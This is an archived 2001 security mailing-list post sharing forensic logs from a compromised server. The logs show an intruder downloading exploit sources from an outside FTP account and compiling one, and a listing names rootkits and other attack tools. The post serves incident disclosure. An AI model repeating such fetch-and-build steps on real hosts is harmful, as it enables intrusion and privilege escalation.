For all those interested in some logs, This cracker has compromised another website - http://www.ac.ac.th/default.htm Logs of commands issued by cracker using ncftp: - LOG - unmodified topcities.com at Sun Sep 23 18:00:36 2001 get PASSWORDat_private/su.c">ftp://accessftp:PASSWORDat_private/su.c topcities.com at Sun Sep 23 18:44:41 2001 topcities.com at Sun Sep 23 18:50:06 2001 get PASSWORDat_private/bsd.c">ftp://accessftp:PASSWORDat_private/bsd.c get PASSWORDat_private/redhat.c">ftp://accessftp:PASSWORDat_private/redhat.c get PASSWORDat_private/lpd.c">ftp://accessftp:PASSWORDat_private/lpd.c get PASSWORDat_private/bsd-x.c">ftp://accessftp:PASSWORDat_private/bsd-x.c get PASSWORDat_private/aix.c">ftp://accessftp:PASSWORDat_private/aix.c get PASSWORDat_private/apache.c">ftp://accessftp:PASSWORDat_private/apache.c get PASSWORDat_private/imapd.c">ftp://accessftp:PASSWORDat_private/imapd.c get PASSWORDat_private/remove.c">ftp://accessftp:PASSWORDat_private/remove.c get PASSWORDat_private/rip.c">ftp://accessftp:PASSWORDat_private/rip.c topcities.com at Sun Sep 23 19:59:46 2001 get PASSWORDat_private/wuftpd-god.c">ftp://accessftp:PASSWORDat_private/wuftpd-god.c topcities.com at Mon Sep 24 09:51:01 2001 topcities.com at Mon Sep 24 14:07:33 2001 topcities.com at Mon Sep 24 19:37:30 2001 get PASSWORDat_private/zone-pre">ftp://accessftp:PASSWORDat_private/zone-pre get PASSWORDat_private/SEClpd.c">ftp://accessftp:PASSWORDat_private/SEClpd.c get PASSWORDat_private/t666.c">ftp://accessftp:PASSWORDat_private/t666.c HISTORY - unmodified get su.c quit ls get su.c quit ls quit ls get su.c gcc -o su su.c quit ls get bsd.c get redhat.c get lpd.c get bsd-x..c get bsd-x.c getaix.c get aix.c get apache.c get imapd.c get remove.c get rip.c get rpc.autofsd.c get wu-scan.c quit get wu.c ls get wuftpd-god.c quit ls exit ls get zone-pre get SEClpd get SEClpd.c get t666.c get rpc.c quit [root@www .ncftp]# vi trace -- modified to protect someone SESSION STARTED at: Mon Sep 24 19:37:15 2001 Program Version: NcFTP 3.0.0/354 October 04 1999, 04:17 AM Library Version: LibNcFTP 3.0b3 (October 2, 1999) Process ID: 13472 Platform: linux-x86 Uname: Linux|www.COMPROMISED.com.sg|2.2.14-5.0smp|#1 SMP Tue Mar 7 21:01:40 EST 2000|i686^M Hostname: www.COMPROMISED.com.sg (rc=2) 19:37:15 Fw: firewall.COMPROMISED.com.sg Type: 0 User: jogja Pass: ******** Port: 21 19:37:15 FwExceptions: .COMPROMISED.com.sg,localhost,localdomain 19:37:15 Resolving topcities.com... 19:37:16 Connecting to 64.152.192.119... 19:37:17 Remote server is running NcFTPd. 19:37:17 Logging in... 19:37:17 220: topcities.com NcFTPd Server (licensed copy) ready. 19:37:17 Connected to 64.152.192.119. 19:37:17 Cmd: USER accessftp 19:37:28 331: User accessftp okay, need password. 19:37:28 Cmd: PASS xxxxxxxx 19:37:29 Logging in... 19:37:29 230: ####################################################################### 19:37:29 ####################################################################### 19:37:29 19:37:29 Welcome, accessftp. You are now logged into your account. 19:37:29 19:37:29 Your web site address: http://accessftp.topcities.com 19:37:29 You are connected from IP Address: [COMPROMISED HOST IP] 19:37:29 Space limit for your account: 153600000 bytes 19:37:29 Space used: 5377648 bytes 19:37:29 Maximum per-file size: 900 Kb 19:37:29 Upload bandwidth limit: 5 kB/sec 19:37:29 Download bandwidth limit: 2 kB/sec 19:37:29 PT: 0.20 19:37:29 19:37:29 Note: Please do not exceed your account quota by uploading files 19:37:29 larger than 900Kb or exceeding your space limit. If you do, subsequent 19:37:29 uploads will be unsucessful without notice to you. 19:37:29 19:37:29 ####################################################################### 19:37:29 ####################################################################### 19:37:29 19:37:29 19:37:29 19:37:29 Restricted user logged in. 19:37:29 Cmd: PWD 19:37:29 257: "/" is cwd. 19:37:29 Logged in to 64.152.192.119 as accessftp. 19:37:29 Cmd: FEAT 19:37:30 211: Extensions supported: 19:37:30 CLNT 19:37:30 MDTM 19:37:30 MLST type*;size*;modify*;UNIX.mode*;UNIX.owner;UNIX.uid;UNIX.group;UNIX.gid;unique 19:37:30 PASV 19:37:30 REST STREAM 19:37:30 SIZE 19:37:30 TVFS 19:37:30 Compliance Level: 19981201 (IETF mlst-05) 19:37:30 End. 19:37:30 Cmd: HELP SITE 19:37:30 214: The following SITE commands are recognized: 19:37:30 19:37:30 Logged in to topcities.com. 19:37:30 Cmd: CLNT NcFTP 3.0.0 linux-x86 19:37:31 200: Noted. 19:37:42 > ls 19:37:42 Cmd: OPTS MLST type;size;modify;UNIX.mode;UNIX.owner;UNIX.uid;UNIX.group;UNIX.gid 19:37:42 200: Options accepted: type;size;modify;UNIX.mode;UNIX.uid;UNIX.gid 19:37:42 Cmd: PASV 19:37:42 227: Entering Passive Mode (64,152,192,119,11,87) 19:37:43 Cmd: MLSD 19:37:43 150: Data connection accepted from [COMPROMISED HOST IP]:3758; transfer starting. 19:37:44 226: Listing completed. 19:37:44 Remote listing contents { 19:37:44 type=cdir;modify=20010923154433;UNIX.mode=0777;UNIX.uid=99;UNIX.gid=99 / 19:37:44 type=file;size=229995;modify=20010918134314;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 GaP.tcl 19:37:44 type=dir;modify=20010922190607;UNIX.mode=0755;UNIX.uid=99;UNIX.gid=99 IIS 19:37:44 type=file;size=9911;modify=20010918055419;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 SEClpd.c 19:37:44 type=file;size=44356;modify=20010915112702;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 VBTERM.ZIP 19:37:44 type=dir;modify=20010818023652;UNIX.mode=0777;UNIX.uid=99;UNIX.gid=99 _data 19:37:44 type=file;size=3543;modify=20010923093715;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 aix.c 19:37:44 type=file;size=55871;modify=20010911095825;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 allchan.tcl 19:37:44 type=file;size=6242;modify=20010915094640;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 amountdexp.zip 19:37:44 type=file;size=3066;modify=20010923094606;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 apache.c 19:37:44 type=file;size=5241;modify=20010911102601;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 ascii.tcl 19:37:44 type=file;size=24973;modify=20010919175706;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 bsd-x.c 19:37:44 type=file;size=25979;modify=20010913114244;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 bsd.c 19:37:44 type=file;size=53057;modify=20010911102624;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 fonts.txt 19:37:44 type=dir;modify=20010917133407;UNIX.mode=0755;UNIX.uid=99;UNIX.gid=99 ftp 19:37:44 type=file;size=3626;modify=20010911090829;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 host.tcl 19:37:44 type=file;size=3332;modify=20010915102000;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 imapd.c 19:37:44 type=file;size=2886;modify=20010919011110;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 index.htm 19:37:44 type=file;size=1784;modify=20010922040601;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 loadnc.asp 19:37:44 type=file;size=2516;modify=20010911121619;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 lpd.c 19:37:44 type=file;size=3726;modify=20010918075807;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 named.htm 19:37:44 type=file;size=75482;modify=20010919130336;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 nc110.tgz 19:37:44 type=file;size=2003;modify=20010911095755;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 ns.tcl 19:37:44 type=file;size=7127;modify=20010917160516;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 oftpd.tar.gz 19:37:44 type=file;size=689;modify=20010915095601;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 p3-sunos.tar.gz 19:37:44 type=file;size=29;modify=20010911180121;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 ps.txt 19:37:44 type=file;size=87;modify=20010911103054;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 psy.txt 19:37:44 type=file;size=197126;modify=20010905125107;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 psyBNC2.2.tar.gz 19:37:44 type=file;size=5181;modify=20010923104845;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 redhat.c 19:37:44 type=file;size=5101;modify=20010923164829;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 remove.c 19:37:44 type=file;size=5553;modify=20010911123908;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 rip.c 19:37:44 type=file;size=2721;modify=20010923130108;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 rkit.tar.gz 19:37:44 type=file;size=3341;modify=20010912062001;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 rpc.autofsd.c 19:37:44 type=file;size=2837;modify=20010923151532;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 rpc.c 19:37:44 type=file;size=2924;modify=20010912055334;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 rpcBSD.tar.gz 19:37:44 type=file;size=19119;modify=20010911125301;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 statdx.c 19:37:44 type=file;size=11990;modify=20010911121600;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 su.c 19:37:44 type=file;size=7394;modify=20010922100655;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 sunbrute.c 19:37:44 type=file;size=19809;modify=20010912055508;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 t666.c 19:37:44 type=file;size=242007;modify=20010921110904;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 tel.zip 19:37:44 type=file;size=2502;modify=20010919184357;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 unicode.txt 19:37:44 type=file;size=145408;modify=20010921111014;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 unzip.exe 19:37:44 type=file;size=492;modify=20010922040606;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 upload.asp 19:37:44 type=file;size=5867;modify=20010922040613;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 upload.inc 19:37:44 type=file;size=2095;modify=20010918063433;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 wu-scan.c 19:37:44 type=file;size=20964;modify=20010918085052;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 wuftpd-god.c 19:37:44 type=file;size=19343;modify=20010913115048;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 wuftpd.c 19:37:44 type=file;size=10244;modify=20010923154437;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 zone-pre 19:37:44 } 19:37:44 aix.c IIS/ psy.txt t666.c 19:37:44 allchan.tcl imapd.c redhat.c tel.zip 19:37:44 amountdexp.zip index.htm remove.c unicode.txt 19:37:44 apache.c loadnc.asp rip.c unzip.exe 19:37:44 ascii.tcl lpd.c rkit.tar.gz upload.asp 19:37:44 bsd.c named.htm rpc.autofsd.c upload.inc 19:37:44 bsd-x.c nc110.tgz rpcBSD.tar.gz VBTERM.ZIP 19:37:44 _data/ ns.tcl rpc.c wuftpd.c 19:37:44 fonts.txt oftpd.tar.gz SEClpd.c wuftpd-god.c 19:37:44 ftp/ p3-sunos.tar.gz statdx.c wu-scan.c 19:37:44 GaP.tcl ps.txt su.c zone-pre 19:37:44 host.tcl psyBNC2.2.tar.gz sunbrute.c 19:38:01 > get zone-pre 19:38:01 Cmd: TYPE I 19:38:01 200: Type okay. 19:38:01 Cmd: MLST zone-pre 19:38:02 250: Begin 19:38:02 type=file;size=10244;modify=20010923154437;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 /zone-pre 19:38:02 End. 19:38:02 Cmd: PASV 19:38:02 227: Entering Passive Mode (64,152,192,119,11,88) 19:38:02 Cmd: RETR zone-pre 19:38:03 150: Data connection accepted from [COMPROMISED HOST IP]:3759; transfer starting for zone-pre (10244 bytes). 19:38:05 226: Transfer completed. 19:38:29 > get SEClpd 19:38:29 Cmd: MLST SEClpd 19:38:30 550: No such file or directory. 19:38:30 Cmd: SIZE SEClpd 19:38:30 550: No such file. 19:38:30 Cmd: PASV 19:38:30 227: Entering Passive Mode (64,152,192,119,11,90) 19:38:31 Cmd: RETR SEClpd 19:38:31 550: No such file. 19:38:39 > get SEClpd.c 19:38:39 Cmd: MLST SEClpd.c 19:38:39 250: Begin 19:38:39 type=file;size=9911;modify=20010918055419;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 /SEClpd.c 19:38:39 End. 19:38:39 Cmd: PASV 19:38:42 227: Entering Passive Mode (64,152,192,119,11,91) 19:38:42 Cmd: RETR SEClpd.c 19:38:42 150: Data connection accepted from [COMPROMISED HOST IP]:3761; transfer starting for SEClpd.c (9911 bytes). 19:38:44 226: Transfer completed. 19:39:36 > get t666.c 19:39:36 Cmd: MLST t666.c 19:39:37 250: Begin 19:39:37 type=file;size=19809;modify=20010912055508;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99 /t666.c 19:39:37 End. 19:39:37 Cmd: PASV 19:39:37 227: Entering Passive Mode (64,152,192,119,11,93) 19:39:38 Cmd: RETR t666.c 19:39:38 150: Data connection accepted from [COMPROMISED HOST IP]:3762; transfer starting for t666.c (19809 bytes). 19:39:41 226: Transfer completed. 19:58:54 > get rpc.c 19:58:54 Cmd: MLST rpc.c 19:58:54 Remote host has closed the connection. 19:58:54 421: Disconnecting you since you were inactive for 180 seconds. 19:58:54 Passive mode refused. 19:59:11 > quit SESSION ENDED at: Mon Sep 24 19:59:11 2001 ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Sep 26 2001 - 08:25:37 PDT